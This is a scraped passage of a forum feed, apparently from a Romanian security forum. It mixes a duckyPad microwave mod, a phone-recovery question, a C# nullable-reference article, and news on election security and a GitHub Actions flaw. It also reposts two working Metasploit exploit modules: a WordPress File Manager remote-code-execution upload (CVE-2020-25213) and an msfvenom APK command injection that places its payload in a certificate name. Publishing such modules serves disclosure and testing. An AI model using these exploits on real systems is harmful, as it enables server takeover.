dime. But as you can see, it is very messy with 10 wires coming out of the case, and I'm sure I could do better. Pimp It Up! Around the same time, I was working on duckyPad, a 15-key mechanical macropad with OLED, hot-swap, RGB, and sophisticated input automation with duckyScript: Feel free to check out the project page if you're interested! I called it a "Do-It-All Macropad", so to live up to its name, it was only natural that I get it working on my microwave too! And if I pull this off, my lowly 20-year-old second-hand broken microwave will transform into the only one in the entire world with mechanical switches and RGB lighting! Now that's what I call ... a Korean Custom 😅. However, it wasn't as easy as it sounds. There are a number of challenges: I want to use the existing duckyPad as-is, so no redesigning. I want to keep it clean and tidy, so the fewer wires the better. It has to be powered by the microwave itself too. PMM Board Right now, there are 10 wires coming out of the case and into my hand-made keypad, very messy. Ideally, with duckyPad, I want it to use only 3 wires: Power, Ground, and Data. With so few wires, they can be inside a single cable, which would be much more clean and tidy. However, the microwave controller still expects 10 wires from the keypad matrix. So that means I would need an adapter of some sort. Let's just call it PMM board. duckyPad would talk to PMM board, which in turn talks to the microwave controller. Something like this: Not too bad! However, until now we have been using real switches with the keypad matrix. But with PMM board, we will need to control the key matrix electronically to fool the microwave into thinking we pressed buttons! How do we do it? Blast From the Past It came as a bit of a surprise, but after some digging, it turned out that I solved this exact problem 3 years ago! Back then, I was trying to automate inputs of Nintendo Switch Joycons, and they also used matrix scanning for their buttons. And the answer? Analogue Switches! You can think of them as regular switches, but instead of pushing them with your fingers, they are controlled electronically. The chip I used is ADG714 from Analog Devices. There are 8 switches in one chip, and they are controlled via simple SPI protocol: I quickly designed the PMM board: It's a relatively simple board. A STM32F042F6P6 is used, and I broke out all of its pins on headers in case I need them. Since there are 14 buttons that I want to control, two ADG714s are needed. With SPI, they can be daisy-chained easily. You can see in the schematic that the analogue switches are wired up in exactly the same way as my shoddy hand-soldered keypad. Except now they can be pressed electronically by the microcontroller. I had the PCB made, and soldered on all the components: I did a preliminary testing with continuity beeper, and it seemed to work fine, but we'll only know for sure once it is installed on the real thing. Serial-ous Talk Now the PMM board can control the button matrix, how should duckyPad talk to it? With only 1 wire for data, I reckoned that a simple one-way serial link should be more than enough. duckyPad would send a simple serial message at 115200bps every time a key is pressed. The PMM board receives it, and if the format is correct, it would momentarily close the corresponding analog switch, simulating a button press to the microwave. I added a top-secret UARTPRINT command to the duckyScript parser, and created a profile for my microwave keypad. They keys on duckyPad is arranged as follows: Why So Negative? It's all coming together! Which brings us to the final question: How are we going to power it? I thought it would be straightforward. There is already a microcontroller on the microwave circuit board, so just tap its power and job done! Turns out, almost but not quite. Examining the circuit board in detail, it turns out the whole thing runs on negative voltages. We can see it gets -26V from the transformer, steps it down to -12V, then again to -5V. The voltage regulator is a S7905PIC fixed-negative-voltage regulator, further confirming this theory. I'm not sure why it is designed this way, probably has something to do with the AC transformer. Still, it doesn't actually matter that much, as it's just from a different point of reference. I tapped two power wires from the circuit board to power the PMM board, and in turn, duckyPad: To reduce confusion, I marked them 0V and -5V. Usually, we would connect 0V to GND, and a positive voltage to VCC. But in this case, 0V is actually at the higher potential. So all I needed to do is connect -5V to GND, and 0V to VCC. The potential difference is still 5V, so everything works. (Eagle eyed viewers might notice I also covered the buzzer with a sticker. It was so loud!) A Duckin' Great Time! I reinstalled the circuit board, hooked everything up and did a quick test, it works! You can see the 3 wires going from duckyPad debug header to PMM board, as well as the 10 wires going into the control board where the blue ribbon cable used to be. I attached the duckyPad to the microwave, chopped off the ends of a cheap USB cable, and used the 4 wires inside to connect everything up through a vent at the bottom. Voilà! It's done! The first and (probably) only microwave in the entire universe with mechanical switches, OLED, and RGB lighting! Have you ever experienced the crisp and clicky tactile and audible perfection of Gateron Greens while heating up some frozen junk food at 2am because you're too lazy to cook? Well, I have, so there's that! Click me for high-res video with sound! I want one too! If you're interested in duckyPad, you can learn more about it and get one here! And if you want the whole package, unfortunately it would be much more involved. Each microwave have different keypad matrix layouts, so you'll need to figure them out, and design and build a PMM board yourself. Not a small feat, but at least all the information is here! If you do go down this path, let me know if you have any questions! Of course there are high voltages and potential of microwave radiation when you take it apart, so be careful! Other Stuff I've done a few other fun projects over the years, feel free to check them out: Daytripper: Hide-my-windows Laser Tripwire: Saves the day while you slack off! exixe: Miniture Nixie Tube driver module: Eliminate the need for vintage chips and multiplexing circuits. From Aduino to STM32: A detailed tutorial to get you started with STM32 development. List of all my repos Questions or Comments? Please feel free to open an issue, ask in the official duckyPad discord, DM me on discord dekuNukem#6998, or email dekuNukem@gmail.com for inquires. Source
- 1 reply
-
- 2
-
Nu era criptat este doar pattern, l-am gasit acum dupa ani 2016 cred - iti imaginezi ca nu stiu pattern-ul 2. nu am cum sa schimb placa,imi fac back-up baietii din service, evit situatia asta 3. Am urmarit un tutorial pe YouTube, unde explica un indian cum se recupereaza cu SDK si ADB (debug), insa imi cere sa pun AV-ul pe off, nu risc
-
Salut, detin un telefon model Lenovo A2016a40, a trecuty o janta de 17" peste el. Vreau sa scot tot din el in PC (imagini din vacanta... etc), are pattern si nu il mai stiu (il conectam la un adaptor USB cu mouse); Am instalat sync, insa... nu ii pot da allow din telefon. Multumesc!
-
The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution', 'Description' => %q{ The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alex Souza (w4fz5uck5)', # initial discovery and PoC 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module ], 'References' => [ [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ], [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ], [ 'CVE', '2020-25213' ] ], 'Platform' => [ 'php' ], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'WordPress File Manager 6.0-6.8', { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]]) ] ) end def check return CheckCode::Unknown unless wordpress_and_online? # check the plugin version from readme check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0') end def exploit # base path to File Manager plugin file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager') # filename of the file to be uploaded/created filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php" register_file_for_cleanup(filename) case datastore['COMMAND'] when 'upload' elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename) when 'mkfile+put' elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename) elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename) end payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename) print_status("#{peer} - Payload is at #{payload_uri}") # execute the payload send_request_cgi('uri' => normalize_uri(payload_uri)) end # make it easier to switch between "upload" and "mkfile+put" exploit methods def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {}) filename = opts['filename'] # prep for exploit post_data = Rex::MIME::Message.new post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"') case elfinder_cmd when 'upload' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"") when 'mkfile' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(filename, nil, nil, 'form-data; name="name"') when 'put' post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"') end res = send_request_cgi( 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 end end Source
-
- 1
-
Rapid7 Metasploit Framework msfvenom APK Template Command Injection
Kev posted a topic in Exploituri
This Metasploit module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affected includes Metasploit Framework versions 6.0.11 and below and Metasploit Pro versions 4.18.0 and below. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/zip/jar' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super( update_info( info, 'Name' => 'Rapid7 Metasploit Framework msfvenom APK Template Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x <crafted_file.apk> }, 'License' => MSF_LICENSE, 'Author' => [ 'Justin Steven' # @justinsteven ], 'References' => [ ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'], ['CVE', '2020-7384'], ], 'DefaultOptions' => { 'DisablePayloadHandler' => true }, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x22\x2c\x5c\x0a\x0d" }, 'Targets' => [[ 'Automatic', {}]], 'Privileged' => false, 'DisclosureDate' => '2020-10-29' ) ) register_options([ OptString.new('FILENAME', [true, 'The APK file name', 'msf.apk']) ]) end def build_x509_name name = "CN=';(#{payload.encoded}) >&- 2>&- & #" OpenSSL::X509::Name.parse(name) end def generate_signing_material key = OpenSSL::PKey::RSA.new(2048) cert = OpenSSL::X509::Certificate.new cert.version = 2 cert.serial = 1 cert.subject = cert.issuer = build_x509_name cert.public_key = key.public_key cert.not_before = Time.now # FIXME: this will break in the year 2037 on 32-bit systems cert.not_after = cert.not_before + 1.year # Self-sign the certificate, otherwise the victim's keytool gets unhappy cert.sign(key, OpenSSL::Digest::SHA256.new) [cert, key] end def exploit print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash') apk = Rex::Zip::Jar.new apk.build_manifest cert, key = generate_signing_material apk.sign(key, cert) data = apk.pack file_create(data) end end Source-
- 1
-
^ {[In caz* (tastatura) u langa i ]} \ Trebuia sa specifici Aviz amatorilor, NU sunati inapoi, sunt numere cu suprataxa (taxa inversa) ascultati muzica de platiti factura cat pentru toate biletele Cenaclul Flacara
-
It's not a secret that Microsoft has been working on the 8-th version of C# language for quite a while. The new language version (C# 8.0) is already available in the recent release of Visual Studio 2019, but it's still in beta. This new version is going to have a few features implemented in a somewhat non-obvious, or rather unexpected, way. Nullable Reference types are one of them. This feature is announced as a means to fight Null Reference Exceptions (NRE). It's good to see the language evolve and acquire new features to help developers. By coincidence, some time ago, we significantly enhanced the ability of PVS-Studio's C# analyzer to detect NREs. And now we're wondering if static analyzers in general and PVS-Studio in particular should still bother to diagnose potential null dereferences since, at least in new code that will be making use of Nullable Reference, such dereferences will become "impossible"? Let's try to clear that up. Pros and cons of the new feature One reminder before we continue: the latest beta version of C# 8.0, available as of writing this post, has Nullable Reference types disabled by default, i.e. the behavior of reference types hasn't changed. So what are exactly nullable reference types in C# 8.0 if we enable this option? They are basically the same good old reference types except that now you'll have to add '?' after the type name (for example, string?), similarly to Nullable<T>, i.e. nullable value types (for example, int?). Without the '?', our string type will now be interpreted as non-nullable reference, i.e. a reference type that can't be assigned null. Null Reference Exception is one of the most vexing exceptions to get into your program because it doesn't say much about its source, especially if the throwing method contains a number of dereference operations in a row. The ability to prohibit null assignment to a variable of a reference type looks cool, but what about those cases where passing a null to a method has some execution logic depending on it? Instead of null, we could, of course, use a literal, a constant, or simply an "impossible" value that logically can't be assigned to the variable anywhere else. But this poses a risk of replacing a crash of the program with "silent", but incorrect execution, which is often worse than facing the error right away. What about throwing an exception then? A meaningful exception thrown in a location where something went wrong is always better than an NRE somewhere up or down the stack. But it's only good in your own project, where you can correct the consumers by inserting a try-catch block and it's solely your responsibility. When developing a library using (non) Nullable Reference, we need to guarantee that a certain method always returns a value. After all, it's not always possible (or at least easy) even in your own code to replace the returning of null with exception throwing (since it may affect too much code). Nullable Reference can be enabled either at the global project level by adding the NullableContextOptions property with the value enable, or at the file level by means of the preprocessor directive: #nullable enable string cantBeNull = string.Empty; string? canBeNull = null; cantBeNull = canBeNull!; Nullable Reference feature will make types more informative. The method signature gives you a clue about its behavior: if it has a null check or not, if it can return null or not. Now, when you try using a nullable reference variable without checking it, the compiler will issue a warning. This is pretty convenient when using third-party libraries, but it also adds a risk of misleading library's user, as it's still possible to pass null using the new null-forgiving operator (!). That is, adding just one exclamation point can break all further assumptions about the interface using such variables: #nullable enable String GetStr() { return _count > 0 ? _str : null!; } String str = GetStr(); var len = str.Length; Yes, you can argue that this is bad programming and nobody would write code like that for real, but as long as this can potentially be done, you can't feel safe relying only on the contract imposed by the interface of a given method (saying that it can't return null). By the way, you could write the same code using several ! operators, as C# now allows you to do so (and such code is perfectly compilable): cantBeNull = canBeNull!!!!!!!; By writing this way we, so to say, stress the idea, "look, this may be null!!!" (we in our team, we call this "emotional" programming). In fact, when building the syntax tree, the compiler (from Roslyn) interprets the ! operator in the same way as it interprets regular parentheses, which means you can write as many !'s as you like - just like with parentheses. But if you write enough of them, you can "knock down" the compiler. Maybe this will get fixed in the final release of C# 8.0. Similarly, you can circumvent the compiler warning when accessing a nullable reference variable without a check: canBeNull!.ToString(); Let's add more emotions: canBeNull!!!?.ToString(); You'll hardly ever see syntax like that in real code though. By writing the null-forgiving operator we tell the compiler, "This code is okay, check not needed." By adding the Elvis operator we tell it, "Or maybe not; let's check it just in case." Now, you can reasonably ask why you still can have null assigned to variables of non-nullable reference types so easily if the very concept of these type implies that such variables can't have the value null? The answer is that "under the hood", at the IL code level, our non-nullable reference type is still... the good old "regular" reference type, and the entire nullability syntax is actually just an annotation for the compiler's built-in analyzer (which, we believe, isn't quite convenient to use, but I'll elaborate on that later). Personally, we don't find it a "neat" solution to include the new syntax as simply an annotation for a third-party tool (even built into the compiler) because the fact that this is just an annotation may not be obvious at all to the programmer, as this syntax is very similar to the syntax for nullable structs yet works in a totally different way. Getting back to other ways of breaking Nullable Reference types. As of the moment of writing this article, when you have a solution comprised of several projects, passing a variable of a reference type, say, String from a method declared in one project to a method in another project that has the NullableContextOptions enabled will make the compiler assume it's dealing with a non-nullable String and the compiler will remain silent. And that's despite the tons of [Nullable(1)] attributes added to every field and method in the IL code when enabling Nullable References. These attributes, by the way, should be taken into account if you use reflection to handle the attributes and assume that the code contains only your custom ones. Such a situation may cause additional trouble when adapting a large code base to the Nullable Reference style. This process will likely be running for a while, project by project. If you are careful, of course, you can gradually integrate the new feature, but if you already have a working project, any changes to it are dangerous and undesirable (if it works, don't touch it!). That's why we made sure that you don't have to modify your source code or mark it to detect potential NREs when using PVS-Studio analyzer. To check locations that could throw a NullReferenceException, simply run the analyzer and look for V3080 warnings. No need to change the project's properties or the source code. No need to add directives, attributes, or operators. No need to change legacy code. When adding Nullable Reference support to PVS-Studio, we had to decide whether the analyzer should assume that variables of non-nullable reference types always have non-null values. After investigating the ways this guarantee could be broken, we decided that PVS-Studio shouldn't make such an assumption. After all, even if a project uses non-nullable reference types all the way through, the analyzer could add to this feature by detecting those specific situations where such variables could have the value null. How PVS-Studio looks for Null Reference Exceptions The dataflow mechanisms in PVS-Studio's C# analyzer track possible values of variables during the analysis process. This also includes interprocedural analysis, i.e. tracking down possible values returned by a method and its nested methods, and so on. In addition to that, PVS-Studio remembers variables that could be assigned null value. Whenever it sees such a variable being dereferenced without a check, whether it's in the current code under analysis, or inside a method invoked in this code, it will issue a V3080 warning about a potential Null Reference Exception. The idea behind this diagnostic is to have the analyzer get angry only when it sees a null assignment. This is the principal difference of our diagnostic's behavior from that of the compiler's built-in analyzer handling Nullable Reference types. The built-in analyzer will point at each and every dereference of an unchecked nullable reference variable - given that it hasn't been misled by the use of the ! operator or even just a complicated check (it should be noted, however, that absolutely any static analyzer, PVS-Studio being no exception here, can be "misled" one way or another, especially if you are intent on doing so). PVS-Studio, on the other hand, warns you only if it sees a null (whether within the local context or the context of an outside method). Even if the variable is of a non-nullable reference type, the analyzer will keep pointing at it if it sees a null assignment to that variable. This approach, we believe, is more appropriate (or at least more convenient for the user) since it doesn't demand "smearing" the entire code with null checks to track potential dereferences - after all, this option was available even before Nullable Reference were introduced, for example, through the use of contracts. What's more, the analyzer can now provide a better control over non-nullable reference variables themselves. If such a variable is used "fairly" and never gets assigned null, PVS-Studio won't say a word. If the variable is assigned null and then dereferenced without a prior check, PVS-Studio will issue a V3080 warning: #nullable enable String GetStr() { return _count > 0 ? _str : null!; } String str = GetStr(); var len = str.Length; <== V3080: Possible null dereference. Consider inspecting 'str' Now let's take a look at some examples demonstrating how this diagnostic is triggered by the code of Roslyn itself. We already checked this project recently, but this time we'll be looking only at potential Null Reference Exceptions not mentioned in the previous articles. We'll see how PVS-Studio detects potential NREs and how they can be fixed using the new Nullable Reference syntax. V3080 [CWE-476] Possible null dereference inside method. Consider inspecting the 2nd argument: chainedTupleType. Microsoft.CodeAnalysis.CSharp TupleTypeSymbol.cs 244 NamedTypeSymbol chainedTupleType; if (_underlyingType.Arity < TupleTypeSymbol.RestPosition) { .... chainedTupleType = null; } else { .... } return Create(ConstructTupleUnderlyingType(firstTupleType, chainedTupleType, newElementTypes), elementNames: _elementNames); As you can see, the chainedTupleType variable can be assigned the null value in one of the execution branches. It is then passed to the ConstructTupleUnderlyingType method and used there after a Debug.Assert check. It's a very common pattern in Roslyn, but keep in mind that Debug.Assert is removed in the release version. That's why the analyzer still considers the dereference inside the ConstructTupleUnderlyingType method dangerous. Here's the body of that method, where the dereference takes place: internal static NamedTypeSymbol ConstructTupleUnderlyingType( NamedTypeSymbol firstTupleType, NamedTypeSymbol chainedTupleTypeOpt, ImmutableArray<TypeWithAnnotations> elementTypes) { Debug.Assert (chainedTupleTypeOpt is null == elementTypes.Length < RestPosition); .... while (loop > 0) { .... currentSymbol = chainedTupleTypeOpt.Construct(chainedTypes); loop--; } return currentSymbol; } It's actually a matter of dispute whether the analyzer should take Asserts like that into account (some of our users want it to do so) - after all, the analyzer does take contracts from System.Diagnostics.Contracts into account. Here's one small real-life example from our experience of using Roslyn in our own analyzer. While adding support of the latest version of Visual Studio recently, we also updated Roslyn to its 3rd version. After that, PVS-Studio started crashing on certain code it had never crashed on before. The crash, accompanied by a Null Reference Exception, would occur not in our code but in the code of Roslyn. Debugging revealed that the code fragment where Roslyn was now crashing had that very kind of Debug.Assert based null check several lines higher - and that check obviously didn't help. It's a graphic example of how you can get into trouble with Nullable Reference because of the compiler treating Debug.Assert as a reliable check in any configuration. That is, if you add #nullable enable and mark the chainedTupleTypeOpt argument as a nullable reference, the compiler won't issue any warning on the dereference inside the ConstructTupleUnderlyingType method. Moving on to other examples of warnings by PVS-Studio. V3080 Possible null dereference. Consider inspecting 'effectiveRuleset'. RuleSet.cs 146 var effectiveRuleset = ruleSet.GetEffectiveRuleSet(includedRulesetPaths); effectiveRuleset = effectiveRuleset.WithEffectiveAction(ruleSetInclude.Action); if (IsStricterThan(effectiveRuleset.GeneralDiagnosticOption, ....)) effectiveGeneralOption = effectiveRuleset.GeneralDiagnosticOption; This warning says that the call of the WithEffectiveAction method may return null, while the return value assigned to the variable effectiveRuleset is not checked before use (effectiveRuleset.GeneralDiagnosticOption). Here's the body of the WithEffectiveAction method: public RuleSet WithEffectiveAction(ReportDiagnostic action) { if (!_includes.IsEmpty) throw new ArgumentException(....); switch (action) { case ReportDiagnostic.Default: return this; case ReportDiagnostic.Suppress: return null; .... return new RuleSet(....); default: return null; } } With Nullable Reference enabled for the method GetEffectiveRuleSet, we'll get two locations where the code's behavior has to be changed. Since the method shown above can throw an exception, it's logical to assume that the call to it is wrapped in a try-catch block and it would be correct to rewrite the method to throw an exception rather than return null. However, if you trace a few calls back, you'll see that the catching code is too far up to reliably predict the consequences. Let's take a look at the consumer of the effectiveRuleset variable, the IsStricterThan method: private static bool IsStricterThan(ReportDiagnostic action1, ReportDiagnostic action2) { switch (action2) { case ReportDiagnostic.Suppress: ....; case ReportDiagnostic.Warn: return action1 == ReportDiagnostic.Error; case ReportDiagnostic.Error: return false; default: return false; } } As you can see, it's a simple switch statement choosing between two enumerations, with ReportDiagnostic.Default as the default value. So it would be best to rewrite the call as follows: The signature of WithEffectiveAction will change: #nullable enable public RuleSet? WithEffectiveAction(ReportDiagnostic action) This is what the call will look like: RuleSet? effectiveRuleset = ruleSet.GetEffectiveRuleSet(includedRulesetPaths); effectiveRuleset = effectiveRuleset?.WithEffectiveAction(ruleSetInclude.Action); if (IsStricterThan(effectiveRuleset?.GeneralDiagnosticOption ?? ReportDiagnostic.Default, effectiveGeneralOption)) effectiveGeneralOption = effectiveRuleset.GeneralDiagnosticOption; Since IsStricterThan only performs comparison, the condition can be rewritten - for example, like this: if (effectiveRuleset == null || IsStricterThan(effectiveRuleset.GeneralDiagnosticOption, effectiveGeneralOption)) Next example. V3080 Possible null dereference. Consider inspecting 'propertySymbol'. BinderFactory.BinderFactoryVisitor.cs 372 var propertySymbol = GetPropertySymbol(parent, resultBinder); var accessor = propertySymbol.GetMethod; if ((object)accessor != null) resultBinder = new InMethodBinder(accessor, resultBinder); To fix this warning, we need to see what happens to the propertySymbol variable next. private SourcePropertySymbol GetPropertySymbol( BasePropertyDeclarationSyntax basePropertyDeclarationSyntax, Binder outerBinder) { .... NamedTypeSymbol container = GetContainerType(outerBinder, basePropertyDeclarationSyntax); if ((object)container == null) return null; .... return (SourcePropertySymbol)GetMemberSymbol(propertyName, basePropertyDeclarationSyntax.Span, container, SymbolKind.Property); } The GetMemberSymbol method, too, can return null under certain conditions. private Symbol GetMemberSymbol( string memberName, TextSpan memberSpan, NamedTypeSymbol container, SymbolKind kind) { foreach (Symbol sym in container.GetMembers(memberName)) { if (sym.Kind != kind) continue; if (sym.Kind == SymbolKind.Method) { .... var implementation = ((MethodSymbol)sym).PartialImplementationPart; if ((object)implementation != null) if (InSpan(implementation.Locations[0], this.syntaxTree, memberSpan)) return implementation; } else if (InSpan(sym.Locations, this.syntaxTree, memberSpan)) return sym; } return null; } With nullable reference types enabled, the call will change to this: #nullable enable SourcePropertySymbol? propertySymbol = GetPropertySymbol(parent, resultBinder); MethodSymbol? accessor = propertySymbol?.GetMethod; if ((object)accessor != null) resultBinder = new InMethodBinder(accessor, resultBinder); It's pretty easy to fix when you know where to look. Static analysis can catch this potential error with no effort by collecting all possible values of the field from all the procedure call chains. V3080 Possible null dereference. Consider inspecting 'simpleName'. CSharpCommandLineParser.cs 1556 string simpleName; simpleName = PathUtilities.RemoveExtension( PathUtilities.GetFileName(sourceFiles.FirstOrDefault().Path)); outputFileName = simpleName + outputKind.GetDefaultExtension(); if (simpleName.Length == 0 && !outputKind.IsNetModule()) .... The problem is in the line with the simpleName.Length check. The variable simpleName results from executing a long series of methods and can be assigned null. By the way, if you are curious, you could look at the RemoveExtension method to see how it's different from Path.GetFileNameWithoutExtension. A simpleName != null check would be enough, but with non-nullable reference types, the code will change to something like this: #nullable enable public static string? RemoveExtension(string path) { .... } string simpleName; This is what the call might look like: simpleName = PathUtilities.RemoveExtension( PathUtilities.GetFileName(sourceFiles.FirstOrDefault().Path)) ?? String.Empty; Conclusion Nullable Reference types can be a great help when designing architecture from scratch, but reworking existing code may require a lot of time and care, as it may lead to a number of elusive bugs. This article doesn't aim to discourage you from using Nullable Reference types. We find this new feature generally useful even though the exact way it is implemented may be controversial. However, always remember about the limitations of this approach and keep in mind that enabling Nullable Reference mode doesn't protect you from NREs and that, when misused, it could itself become the source of these errors. We recommend that you complement the Nullable Reference feature with a modern static analysis tool, such as PVS-Studio, that supports interprocedural analysis to protect your program from NREs. Each of these approaches - deep interprocedural analysis and annotating method signatures (which is in fact what Nullable Reference mode does) - have their pros and cons. The analyzer will provide you with a list of potentially dangerous locations and let you see the consequences of modifying existing code. If there is a null assignment somewhere, the analyzer will point at every consumer of the variable where it is dereferenced without a check. You can check this project or your own projects for other defects - just download PVS-Studio and give it a try. Source
-
© Greg Nash Officials on alert for potential cyber threats after a quiet Election Day Election officials are cautiously declaring victory after no reports of major cyber incidents on Election Day. But the long shadow of 2016, when the U.S. fell victim to extensive Russian interference, has those same officials on guard for potential attacks as key battleground states tally up remaining ballots. Agencies that have worked to bolster election security over the past years are still on high alert during the vote-counting process, noting that the election is not over even if ballots have already been cast. Election officials at all levels of government have been hyper-focused on the security of the voting process since 2016, when the nation was caught off-guard by a sweeping and sophisticated Russian interference effort that included targeting election infrastructure in all 50 states, with Russian hackers gaining access to voter registration systems in Florida and Illinois. While there was no evidence that any votes were changed or voters prevented from casting a ballot, the targeted efforts created renewed focus on the cybersecurity of voting infrastructure, along with the improving ties between the federal government and state and local election officials. In the intervening years, former DHS Secretary Jeh Johnson designated elections as critical infrastructure, and Trump signed into law legislation in 2018 creating CISA, now the main agency coordinating with state and local election officials on security issues. In advance of Election Day, CISA established a 24/7 operations center to help coordinate with state and local officials, along with social media companies, election machine vendors and other stakeholders. Hovland, who was in the operations center Tuesday, cited enhanced coordination as a key factor for securing this year's election, along with cybersecurity enhancements including sensors on infrastructure in all 50 states to sense intrusions. Top officials were cautiously optimistic Wednesday about how things went. Sen. Mark Warner (D-Va.), the ranking member on the Senate Intelligence Committee, said it was clear agencies including Homeland Security, the FBI and the intelligence community had "learned a ton of lessons from 2016." He cautioned that "we're almost certain to discover something we missed in the coming weeks, but at the moment it looks like these preparations were fairly effective in defending our infrastructure." A major election security issue on Capitol Hill over the past four years has focused on how to address election security threats, particularly during the COVID-19 pandemic, when election officials were presented with new challenges and funding woes. Congress has appropriated more than $800 million for states to enhance election security since 2018, along with an additional $400 million in March to address pandemic-related obstacles. But Democrats and election experts have argued the $800 million was just a fraction of what's required to fully address security threats, such as funding permanent cybersecurity professionals in every voting jurisdiction, and updating vulnerable and outdated election equipment. Threats from foreign interference have not disappeared, and threats to elections will almost certainly continue as votes are tallied, and into future elections. A senior CISA official told reporters late Tuesday night that the agency was watching for threats including disinformation, the defacement of election websites, distributed denial of service attacks on election systems and increased demand on vote reporting sites taking systems offline. With Election Day coming only weeks after Director of National Intelligence John Ratcliffe and other federal officials announced that Russia and Iran had obtained U.S. voter data and were attempting to interfere in the election process, the threats were only underlined. Via msn.com
-
- 1
-
Un caz de nu ai rude in U.S.A.
-
Code shack describes issue as 'moderate' security flaw, plans to disable risky commands gradually Google's bug-hunting Project Zero team has posted details of an injection vulnerability in GitHub Actions after refusing a request to postpone disclosure. The issue arises due to the ability to set environment variables that are then parsed for execution by GitHub Actions. According to the Project Zero disclosure: "As the runner process parses every line printed to STDOUT looking for workflow commands, every Github action that prints untrusted content as part of its execution is vulnerable. In most cases, the ability to set arbitrary environment variables results in remote code execution as soon as another workflow is executed." The problem was discovered in July and reported to GitHub, which issued an advisory deprecating the vulnerable commands, set-env and add-path. GitHub also posted a description of the issue which means that the information posted by Project Zero, while more detailed and including examples, is not such a big reveal. The security hole was assigned CVE-2020-15228 and rated as medium severity. It's hard to fix, as Project Zero researcher Felix Wilhelm noted: "The way workflow commands are implemented is fundamentally insecure." GitHub's solution is to gradually remove the risky commands. The trade-off is that removing the commands will break workflows that use them, but leaving them in place means the vulnerability remains, so folks will be eased off the functionality over time. The Project Zero timeline indicates some frustration with GitHub's response. Normally bug reports are published 90 days after a report is sent to the vendor, or whenever a problem is fixed, whichever is sooner, though this can be extended. On 12 October Project Zero said it told GitHub "that a grace period is available" if it needed more time to disable the vulnerable commands. The response from GitHub was to request a standard 14-day extension to 2 November. On 30 October, Google noted: "Due to no response and the deadline closing in, Project Zero reaches out to other informal Github contacts. The response is that the issue is considered fixed and that we are clear to go public on 2020-11-02 as planned." The implication of that statement is that the post might have been further delayed, yet when GitHub then requested an additional 48 hours "to notify customers," Project Zero said there was "no option to further extend the deadline as this is day 104 (90 days + 14 day grace extension)." Mark Penny, a security researcher at nCipher Security, said on Twitter: GitHub has not ignored the problem, but rather has taken steps towards eventually disabling the insecure feature and providing users with an alternative, so it is hard to see the benefit in disclosure other than in the general sense of putting pressure on vendors to come up with speedy fixes. November has not started well for GitHub. The second day of the month saw the site broken by an expired SSL certificate. Along with all the Twitter complaints, one user found something to be grateful for: "@github your certificate for the assets is expired today … Thanks for showing us that this can happen to everyone, small and big companies." ® Via theregister.com
-
- 1